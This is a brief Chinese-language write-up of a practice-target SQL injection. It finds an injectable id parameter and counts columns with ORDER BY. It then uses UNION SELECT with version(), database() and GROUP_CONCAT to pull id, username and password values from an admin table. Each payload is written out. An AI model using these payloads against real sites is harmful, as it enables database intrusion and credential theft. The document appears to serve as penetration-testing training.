打开靶机
右键源代码 习惯搜一下index 发现php 大概率为MYSQL数据库
点击index.php后发现新建一个网页和之前的一样 结论这个index.php就是靶机
判断是否存在注入点
发现url上有id=1 又是MYSQL数据库 心中窃喜 就可以想到select * from [表] where id=[任何数字]
接下来把id=后改成0+1 看看有没有发现
果然有戏 发现跟原来界面相同 说明0+1被带到数据库中执行所以说存在注入点 接下来我们可以干活了
我们开始猜字段 当然用order by 在id=1后加上and 1=1 order by 1
发现页面没有异常 我们继续猜and 1=1 order by 2
页面也没有异常 继续猜and 1=1 order by 3 这里大家可以写一个小脚本自己跑
页面没有了 说明没有3字段 只有2个字段 那我们就select一下
查询系统自带库以获取表名、字段名
MySQL 在 5 以上的版本都自带了一个数据库,叫 information_schema
通过构造 ?id=1 and 0 union select 1,version() 来判断是否有 information_schema
发现是5以上的版本 说明有 我们在用?id=1 and 0 union select 1,database() 再看看数据库有什么发现
发现库名叫maoshe
获取表名,利用 库名 去 information_schema 查找 表名即可。
发现
发现 id username password
用?id=1 and 0 union select 1,GROUP_CONCAT(id, username, password) from admin limit 0,1提取出id username password
结束!!!